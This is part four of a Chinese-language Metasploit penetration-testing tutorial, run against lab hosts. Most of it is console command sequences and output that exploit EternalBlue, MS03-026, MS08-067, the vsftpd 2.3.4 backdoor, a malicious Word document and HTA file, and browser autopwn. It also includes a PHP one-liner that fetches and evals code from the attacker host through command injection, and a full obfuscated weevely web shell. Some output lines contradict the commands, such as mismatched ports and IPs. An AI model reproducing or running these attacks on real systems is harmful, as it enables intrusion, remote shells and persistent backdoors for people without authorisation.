基于Metasploit的软件渗透测试(四)

简介: 基于Metasploit的软件渗透测试(四)

开始渗透


利用主机漏洞渗透

利用操作系统漏洞

Windows 7
msf6 > nmap -sT -A --script=smb-vuln-ms17-010 -P0 192.168.0.1/24
[*] exec: nmap -sT -A --script=smb-vuln-ms17-010 -P0 192.168.0.1/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-23 16:07 CST
Nmap scan report for 192.168.0.1
Nmap scan report for 192.168.0.158
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs:  CVE:CVE-2017-0143
| Risk factor: HIGH
msf6 > search ms17-010
Matching Modules
================
   #  Name  Disclosure Date  Rank Check  Description
   -  ----  ---------------  ---- -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14   average  YesMS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec   2017-03-14   normal   YesMS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command  2017-03-14   normal   No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010 normal   No MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14   greatYesSMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.0.158
rhost => 192.168.0.158
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] 192.168.0.158:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.0.158:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.158:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.0.158:445 - The target is vulnerable.
[*] 192.168.0.158:445 - Connecting to target for exploitation.
[+] 192.168.0.158:445 - Connection established for exploitation.
[+] 192.168.0.158:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.158:445 - CORE raw buffer dump (40 bytes)
[*] 192.168.0.158:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B
[*] 192.168.0.158:445 - 0x00000010  61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63  asic 7601 Servic
[*] 192.168.0.158:445 - 0x00000020  65 20 50 61 63 6b 20 31  e Pack 1
[+] 192.168.0.158:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.0.158:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.0.158:445 - Sending all but last fragment of exploit packet
[*] 192.168.0.158:445 - Starting non-paged pool grooming
[+] 192.168.0.158:445 - Sending SMBv2 buffers
[+] 192.168.0.158:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.0.158:445 - Sending final SMBv2 buffers.
[*] 192.168.0.158:445 - Sending last fragment of exploit packet!
[*] 192.168.0.158:445 - Receiving response from exploit packet
[+] 192.168.0.158:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.0.158:445 - Sending egg to corrupted connection.
[*] 192.168.0.158:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.0.158
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.158:49667 ) at 2022-06-23 16:32:15 +0800
[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >


Windows 2000

msf6> use exploit/windows/dcerpc/ms03_026_dcom
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) > show targets
Exploit targets:
   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOST 192.168.0.170
RHOST => 192.168.0.170
msf6 exploit(windows/dcerpc/ms03_026_dcom) > run
[*] 192.168.0.170:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 192.168.0.170:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.0.170[135] ...
[*] 192.168.0.170:135 - Calling DCOM RPC with payload (1648 bytes) ...
[*] Started bind TCP handler against 192.168.0.170:4444
[*] Command shell session 1 opened (192.168.0.150:34825 -> 192.168.0.170:4444) at 2022-07-21 15:40:55 +0800
Shell Banner:
Microsoft Windows 2000 [Version 5.00.2195]
-----
C:\WINNT\system32>


利用木马

Windows 10、7、2003

msf> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf exploit/multi/handler> set lhost 192.168.0.150
lhost => 192.168.0.150
msf exploit/multi/handler> set lport 8888
lport => 8888
msf exploit/multi/handler> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit/multi/handler> run
[*] Started reverse TCP handler on 192.168.0.150:8888
[*] Sending stage (175686 bytes) to 192.168.0.106
[*] Meterpreter session 1 opened (192.168.0.150:8888 -> 192.168.0.106:3552) at 2022-07-21 11:02:24 +0800
meterpreter >


利用客户端漏洞渗透

利用软件vsftpd 2.3.4

Linux

msf6 > nmap -sT -A -P0 192.168.0.161
msf6 exploit(windows/smb/ms08_067_netapi) > nmap -sT -A -P0 192.168.0.161
[*] exec: nmap -sT -A -P0 192.168.0.161
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-14 18:36 CST
Nmap scan report for 192.168.0.161
Host is up (0.00081s latency).
Not shown: 977 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 192.168.0.150
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_ssl-date: 2022-07-14T10:36:30+00:00; +6s from scanner time.
msf6 >search vsftpd
Matching Modules
================
   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.0.161
rhost => 192.168.0.161
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >exploit
[*] 192.168.0.161:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.0.161:21 - USER: 331 Please specify the password.
[+] 192.168.0.161:21 - Backdoor service has been spawned, handling...
[+] 192.168.0.161:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.0.150:35303 -> 192.168.0.161:6200) at 2022-07-14 18:41:26 +0800


暴力猜测目标开放的端口

Windows 2000

mf6>use exploit/windows/smb/ms08_067_netapi


msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp_allports
msf6 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.0.158
rhost => 192.168.0.158
msf6 exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on 192.168.0.150:1
[*] 192.168.0.158:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175686 bytes) to 192.168.0.158
[*] 192.168.0.158 - Meterpreter session 1 closed.  Reason: Died
[-] Meterpreter session 1 is not valid and will be closed
192.168.0.158 windows 2000 自动关机


使用msf.doc文件

Windows 2000 SP0/SP4 English

msf6 exploit(windows/browser/ms10_002_aurora) > use exploit/windows/fileformat/ms11_006_createsizeddibsection
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/ms11_006_createsizeddibsection) > info
Name: MS11-006 Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
Module: exploit/windows/fileformat/ms11_006_createsizeddibsection
Platform: Windows
       Arch: 
Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2010-12-15
Provided by:
  Moti & Xu Hao
  Yaniv Miron aka Lament of ilhack
  jduck 
Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Windows 2000 SP0/SP4 English
  2   Windows XP SP3 English
  3   Crash Target for Debugging
Check supported:
  No
Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME  msf.doc          yes       The file name.
Payload information:
  Space: 512
  Avoid: 1 characters
Description:
  This module exploits a stack-based buffer overflow in the handling
  of thumbnails within .MIC files and various Office documents. When
  processing a thumbnail bitmap containing a negative 'biClrUsed'
  value, a stack-based buffer overflow occurs. This leads to arbitrary
  code execution. In order to trigger the vulnerable code, the folder
  containing the document must be viewed using the "Thumbnails" view.
References:
  https://nvd.nist.gov/vuln/detail/CVE-2010-3970
  OSVDB (70263)
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2011/MS11-006
  http://www.securityfocus.com/bid/45662
msf6 exploit(windows/fileformat/ms11_006_createsizeddibsection) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(windows/fileformat/ms11_006_createsizeddibsection) > exploit
[*] Creating 'msf.doc' file ...
[+] msf.doc created at /root/.msf4/local/msf.doc
#cp /root/.msf4/local/msf.doc /home/jerry/


复制msf.docwindows

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.150
lhost => 192.168.0.150
windows下打开msf.doc
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.0.150:8888
[*] Sending stage (175686 bytes) to 192.168.0.169
[*] Meterpreter session 2 opened (192.168.0.150:8888 -> 192.168.0.169:1487) at 2022-07-20 15:47:53 +0800


使用HTA文件进行攻击

Windows 10、7

HTA文件解析程序

image.png

C:\Windows\System32\mshta.exe

image.png


HTA文件解析程序文件运行


demo.hta

<html>
<title>WEB安全测试实验</title>
<link
rel="stylesheet" type="text/css"
href="../css/style.css">
<head>
<meta
http-equiv="Content-Type" content="text/html;
charset=utf-8">
</head>
<body>
<h1>WEB 安全测试实验</h1>
</body>
</html>


WEB 安全测试实验

直接运行

image.png


在浏览器中运行

image.png

开始攻击

#msfconsole 
msf6 > use exploit/windows/fileformat/office_word_hta
msf6 exploit(windows/fileformat/office_word_hta) > show targets
Exploit targets:
   Id  Name
   --  ----
   0   Microsoft Office Word
msf6 exploit(windows/fileformat/office_word_hta) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.150:4444
msf6 exploit(windows/fileformat/office_word_hta) > [+] msf.doc stored at /home/jerry/.msf4/local/msf.doc
[*] Using URL: http://0.0.0.0:8080/default.hta
[*] Local IP: http://192.168.0.150:8080/default.hta
[*] Server started.
[*] Sending stage (175174 bytes) to 192.168.0.106
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.106:8176 ) at 2022-06-16 16:27:50 +0800


打开被攻击对象浏览器,输入http://192.168.0.150:8080/default.hta,直接运行或者保存default.hta再运行,被攻击成功。

msf6 exploit(windows/fileformat/office_word_hta) > sessions
Active sessions
===============
  Id  Name  Type   Information  Connection
  --  ----  ----   ---------------------
  1  meterpreter x86/windows  DESKTOP-9A8VFKB\xiang @ DES 192.168.0.150:4444 -> 192.16
  KTOP-9A8VFKB 8.0.106:8176  (192.168.0.106
 )
msf6 exploit(windows/fileformat/office_word_hta) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ls
Listing: C:\Users\xiang\Downloads
=================================
Mode  Size  Type  Last modified  Name
----  ----  ----  -------------  ----
100666/rw-rw-rw-  7185  fil   2022-06-16 16:26:27 +0800  default.hta
100666/rw-rw-rw-  282   fil   2021-04-27 15:13:52 +0800  desktop.ini
meterpreter > pwd
C:\Users\xiang\Downloads
meterpreter > getuid
Server username: DESKTOP-9A8VFKB\xiang


利用浏览器插件:adobe flash进行攻击

没有成功,估计现在不支持adobe flash

#msfconsole

msf6 > search adobe_flash

image.png


msf6 > use 9
msf6 > use exploit/multi/browser/adobe_flash_hacking_team_uaf
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(multi/browser/adobe_flash_hacking_team_uaf) > run
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] Using URL: http://0.0.0.0:8080/y0dKYgEIkI2zc
[*] Local IP: http://192.168.0.150:8080/y0dKYgEIkI2zc
[*] Server started.


服务器安装adobe flash play 17 Active,在浏览器输入:http://192.168.0.150:8080/y0dKYgEIkI2zc,就被激活



监测浏览器漏洞

利用browser_autopwn进行攻击

Windows 10、7、2003

msf6 auxiliary(server/browser_autopwn2) > use server/browser_autopwn
msf6 auxiliary(server/browser_autopwn) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 auxiliary(server/browser_autopwn) > run
[*] Auxiliary module running as background job 27.
msf6 auxiliary(server/browser_autopwn) >
[*] Setup
[*] Starting exploit modules on host 192.168.0.150...
[*] ---
[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/QOSlCDKP
[*] Local IP: http://192.168.0.150:8080/QOSlCDKP
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/LNRlnrxdQ
[*] Local IP: http://192.168.0.150:8080/LNRlnrxdQ
[*] Server started.
[*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/SytDwnNLVJ
[*] Local IP: http://192.168.0.150:8080/SytDwnNLVJ
[*] Server started.
[*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/XxbRZnvPzF
[*] Local IP: http://192.168.0.150:8080/XxbRZnvPzF
[*] Server started.
[*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/dIavmEmlsJvA
[*] Local IP: http://192.168.0.150:8080/dIavmEmlsJvA
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/FSRTIbVUWRDsU
[*] Local IP: http://192.168.0.150:8080/FSRTIbVUWRDsU
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/lIROBHwdaD
[*] Local IP: http://192.168.0.150:8080/lIROBHwdaD
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/pyJEvk
[*] Local IP: http://192.168.0.150:8080/pyJEvk
[*] Server started.
[*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/huhYFRmk
[*] Local IP: http://192.168.0.150:8080/huhYFRmk
[*] Server started.
[*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/jAzqekl
[*] Local IP: http://192.168.0.150:8080/jAzqekl
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/JCbqIs
[*] Local IP: http://192.168.0.150:8080/JCbqIs
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/cBiTChJAeCWA
[*] Local IP: http://192.168.0.150:8080/cBiTChJAeCWA
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/kRyiwct
[*] Local IP: http://192.168.0.150:8080/kRyiwct
[*] Server started.
[*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/YYQeJjzuqe
[*] Local IP: http://192.168.0.150:8080/YYQeJjzuqe
[*] Server started.
[*] Using URL: http://0.0.0.0:8080/PdyJht6uQ
[*] Local IP: http://192.168.0.150:8080/PdyJht6uQ
[*] Server started.


在被测浏览器中输入:http://192.168.0.150:8080/PdyJht6uQ 

[*] 192.168.0.106ie_createobject - Sending exploit HTML...
[*] 192.168.0.106mozilla_nstreerange - Redirecting to .html URL
[*] 192.168.0.106mozilla_nstreerange - Sending HTML
[*] 192.168.0.106mozilla_nstreerange - Sending XUL
[-] 192.168.0.106msxml_get_definition_code_exec - 192.168.0.106:10064 - Browser not supported: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
[-] 192.168.0.106adobe_flash_rtmp - Browser not supported: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
[*] 192.168.0.106ie_cgenericelement_uaf - Requesting: /YYQeJjzuqe
[-] 192.168.0.106ie_cgenericelement_uaf - Browser not supported, sending 404: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Interrupt: use the 'exit' command to quit
msf6 auxiliary(server/browser_autopwn) > sessions -i
Active sessions
===============
No active sessions.


利用browser_autopwn2进行攻击

Windows 2003

msf6 > use server/browser_autopwn2
msf6 auxiliary(server/browser_autopwn2) > run
[*] Auxiliary module running as background job 0.
[*] Searching BES exploits, please wait...
msf6 auxiliary(server/browser_autopwn2) > [*] Starting exploit modules...
[*] Starting listeners...
[*] Time spent: 31.071206468
[*] Using URL: http://0.0.0.0:8080/IqV4IRZ7Q85f
[*] Local IP: http://192.168.0.150:8080/IqV4IRZ7Q85f
[*] The following is a list of exploits that BrowserAutoPwn will consider using.
[*] Exploits with the highest ranking and newest will be tried first.
Exploits
========
 Order  Rank   Name   Payload
 -----  ----   ----   -------
 1 Excellent  firefox_webidl_injection  firefox/shell_reverse_tcp on 4442
 2 Excellent  firefox_tostring_console_injection  firefox/shell_reverse_tcp on 4442
 3 Excellent  firefox_svg_plugin  firefox/shell_reverse_tcp on 4442
 4 Excellent  firefox_proto_crmfrequestfirefox/shell_reverse_tcp on 4442
 5 Excellent  webview_addjavascriptinterface   android/meterpreter/reverse_tcp on 4443
 6 Excellent  samsung_knox_smdm_urlandroid/meterpreter/reverse_tcp on 4443
 7 Great adobe_flash_worker_byte_array_uaf  windows/meterpreter/reverse_tcp on 4444
 8 Great adobe_flash_domain_memory_uafwindows/meterpreter/reverse_tcp on 4444
 9 Great adobe_flash_copy_pixels_to_byte_arra windows/meterpreter/reverse_tcp on 4444
 10 Great adobe_flash_casi32_int_overflow windows/meterpreter/reverse_tcp on 4444
 11 Great adobe_flash_delete_range_tl_op  osx/x86/shell_reverse_tcp on 4447
 12 Great adobe_flash_uncompress_zlib_uaf windows/meterpreter/reverse_tcp on 4444
 13 Great adobe_flash_shader_job_overflow windows/meterpreter/reverse_tcp on 4444
 14 Great adobe_flash_shader_drawing_fill  windows/meterpreter/reverse_tcp on 4444
 15 Great adobe_flash_pixel_bender_bofwindows/meterpreter/reverse_tcp on 4444
 16 Great adobe_flash_opaque_background_uaf  windows/meterpreter/reverse_tcp on 4444
 17 Great adobe_flash_net_connection_confusion windows/meterpreter/reverse_tcp on 4444
 18 Great adobe_flash_nellymoser_bof windows/meterpreter/reverse_tcp on 4444
 19 Great adobe_flash_hacking_team_uaf   windows/meterpreter/reverse_tcp on 4444
 20 Good wellintech_kingscada_kxclientdownloa windows/meterpreter/reverse_tcp on 44 44
 21 Good ms14_064_ole_code_execution   windows/meterpreter/reverse_tcp on 4444
[+] Please use the following URL for the browser attack:
[+] BrowserAutoPwn URL: http://192.168.0.150:8080/IqV4IRZ7Q85f
[*] Server started.


在被测浏览器中输入:http://192.168.0.150:8080/IqV4IRZ7Q85f

[*] Gathering target information for 192.168.0.169
[*] Sending HTML response to 192.168.0.169
[*] 192.168.0.169    wellintech_kingscada_kxclientdownload - Requested: /PIJKiQZx/hqDDuX/
[*] 192.168.0.169    wellintech_kingscada_kxclientdownload - Sending KingScada kxClientDownload.ocx ActiveX Remote Code Execution
[*] 192.168.0.169    ms14_064_ole_code_execution - Sending exploit...
[*] 192.168.0.169    ms14_064_ole_code_execution - Sending VBS stager
[*] Sending stage (175686 bytes) to 192.168.0.169
[*] Meterpreter session 3 opened (192.168.0.150:4444 -> 192.168.0.169:1525) at 2022-07-20 17:36:45 +0800


利用Web漏洞

Windows 10、7、2003、2000

http://192.168.0.160:8100/sec/17/example.php?cmd=是一个PHP命令注入漏洞

msf6 > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > options
Module options (exploit/multi/script/web_delivery):
Name Current Setting  Required  Description
---- ---------------  --------  -----------
SRVHOST  0.0.0.0   yes The local host or network interface to listen on. This
  must be an address on the local machine or 0.0.0.0 to l
  isten on all addresses.
SRVPORT  8080  yesThe local port to listen on.
SSL  falsenoNegotiate SSL for incoming connections
SSLCert  no Path to a custom SSL certificate (default is randomly g
   enerated)
URIPATH noThe URI to use for this exploit (default is random)
Payload options (python/meterpreter/reverse_tcp):
 Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOSTyes   The listen address (an interface may be specified)
LPORT  4444 yesThe listen port
Exploit target:
Id  Name
--  ----
   0   Python
msf6 exploit(multi/script/web_delivery) > show targets
Exploit targets:
   Id  Name
   --  ----
   0   Python
   1   PHP
   2   PSH
   3   Regsvr32
   4   pubprn
   5   SyncAppvPublishingServer
   6   PSH (Binary)
   7   Linux
   8   Mac OS X
msf6 exploit(multi/script/web_delivery) > set target 1
target => 1
msf6 exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(multi/script/web_delivery) > set lport 8899
lport => 8888
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.150:8899  
[*] Using URL: http://0.0.0.0:8080/SPzNh9
msf6 exploit(multi/script/web_delivery) > [*] Local IP: http://192.168.0.150:8080/SPzNh9  
[*] Server started.  
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.0.150:8080/SPzNh9', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"
在浏览器中输入:http://192.168.0.160:8100/sec/17/example.php?cmd=php%20-d%20allow_url_fopen=true%20-r%20%22eval(file_get_contents(%27http://192.168.0.160:8080/SPzNh9%27,%20false,%20stream_context_create([%27ssl%27=%3E[%27verify_peer%27=%3Efalse,%27verify_peer_name%27=%3Efalse]])));%22
[*] 192.168.0.150   web_delivery - Delivering Payload (1114 bytes)
[*] Sending stage (39282 bytes) to 192.168.0.150
[*] Meterpreter session 1 opened (192.168.0.150:8899 -> 192.168.0.160:38676 ) at 2022-06-16 18:38:14 +0800
msf6 exploit(multi/script/web_delivery) > sessions
Active sessions
===============
  Id  Name  TypeInformation   Connection
  --  ----  ---------------   ----------
  1   meterpreter php/linux  www-data @ Jerry  192.168.0.150:8899 -> 192.168.0.150:38676  (192.168.0.150)
msf6 exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > dir
Listing: /var/www/html/sec/17
=============================
Mode  Size  Type  Last modified  Name
----  ----  ----  -------------  ----
100766/rwxrw-rw-  110   fil   2022-06-06 19:09:45 +0800  example.php
meterpreter > pwd
/var/www/html/sec/17
meterpreter > getuid
Server username: www-data


利用Web系统进行远程控制

#weevely generate 123456 ./testweb.php
Generated './testweb.php' with password '123456' of 677 byte size.

image.png


testweb.php

<?php
$B='$k){hg$c=strlen($hgk)hg;$l=sthghgrlen($t);hg$o="";for($i=0hg;hg$i<$l;)hg{for($j=hg0;($jhghg<hg$chg&&$i<$l);$jhg++,$ih';< span=""></hg$chg&&$i<$l);$jhg++,$ih';<>
$c='=@ob_get_conthgentshg();@ob_hgend_clhgean();$r=hg@bashge64_enhgcodehg(@x(@hggzhgcompresshg($o),$k));prihgnt("$phg$khgh$r$kf");}';
$R=str_replace('R','','crReaRRte_fuRncRtRion');
$L='$k="ehg10hgahgdc3hg9";$kh="49ba5hg9abbe5hg6";$khgf="e057f20fhghg883e";$p="kRXhgw88VYFzhgEOYQOk"hghg;functihgon x($hgt,';
$I=':/hghg/inputhg"),hg$mhg)==1) {@ob_starhgt();@evahgl(@gzuncomhgpresshg(@x(@hgbashge64_decodhge($m[1]hg),$k)))hg;hghg$o';
$k='g++){$o.=$t{$i}^$k{$j}hg;}}rhgeturnhg $o;}ifhg hg(@prhgeg_match("/$khhg(.+)$kfhg/hg",@file_gethghg_conhgtents("php';
$J=str_replace('hg','',$L.$B.$k.$I.$c);
$h=$R('',$J);$h();
?>


# weevely http://192.168.0.106:8100/sec/19/testweb.php 123456
[+] weevely 4.0.1
[+] Target: 192.168.0.150:8100
[+] Session:/root/.weevely/sessions/192.168.0.150/testweb_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely> help
:file_rmRemove remote file.
:file_clearlogRemove string from a file.
:file_editEdit remote file on a local editor.
:file_bzip2  Compress or expand bzip2 files.
:file_upload  Upload file to remote filesystem.
:file_downloadDownload file from remote filesystem. 
:file_ls   List directory content.
:file_webdownload Download an URL.  
:file_cp   Copy single file. 
:file_find Find files with given names and attributes.  
:file_enum Check existence and permissions of a list of paths. 
:file_tar  Compress or expand tar archives. 
:file_touchChange file timestamp.
 :file_zip  Compress or expand zip files. 
 :file_mountMount remote filesystem using HTTPfs.
 :file_gzip Compress or expand gzip files.
 :file_cd   Change current working directory.
 :file_upload2web   Upload file automatically to a web folder and get corresponding URL.
 :file_read Read remote file from the remote filesystem. 
 :file_grep Print lines matching a pattern in multiple files.
 :file_checkGet attributes and permissions of a file.
 :shell_sh  Execute shell commands.
 :shell_php Execute PHP commands. 
 :shell_su  Execute commands with su. 
 :sql_dump  Multi dbms mysqldump replacement.
 :sql_console  Execute SQL query or run console.
 :system_extensionsCollect PHP and webserver extension list.
 :system_info  Collect system information.
 :system_procs List running processes.
 :audit_filesystem Audit the file system for weak permissions.  
 :audit_disablefunctionbypass  Bypass disable_function restrictions with mod_cgi and .htaccess.
 :audit_etcpasswd  Read /etc/passwd with different techniques.  
 :audit_suidsgid   Find files with SUID or SGID flags.  
 :audit_phpconfAudit PHP configuration.  
 :bruteforce_sql   Bruteforce SQL database.  
 :backdoor_tcp Spawn a shell on a TCP port.  
 :backdoor_reversetcp  Execute a reverse TCP shell.  
 :net_scan  TCP Port scan.
 :net_proxy Run local proxy to pivot HTTP/HTTPS browsing through the target.
 :net_ifconfig Get network interfaces addresses.
 :net_curl  Perform a curl-like HTTP request.
 :net_mail  Send mail.
 :net_phpproxy Install PHP proxy on the target.
DESKTOP-9A8VFKB:C:\xampp\htdocs\sec\19 $ system_info
+--------------------+-------------------------------------------------------------------------------------------------------------------------------------+
| document_root    | C:/xampp/htdocs                                                                         |
| whoami                 |                                                                                           |
| hostname              | DESKTOP-9A8VFKB                                                                         |
| pwd                    | C:\xampp\htdocs\sec\19                                                                |
| open_basedir           |                                                                                           |
| safe_mode              | False                                                                                     |
| script                 | /sec/19/testweb.php                                                                     |
| script_folder          | C:\xampp\htdocs\sec\19                                                                |
| uname                  | Windows NT DESKTOP-9A8VFKB 6.2 build 9200 (Windows 8 Home Premium Edition) i586 |
| os                     | Windows NT                                                                              |
| client_ip              | 192.168.0.150                                                                           |
| max_execution_time   | 30                                                                                        |
| php_self               | /sec/19/testweb.php                                                                     |
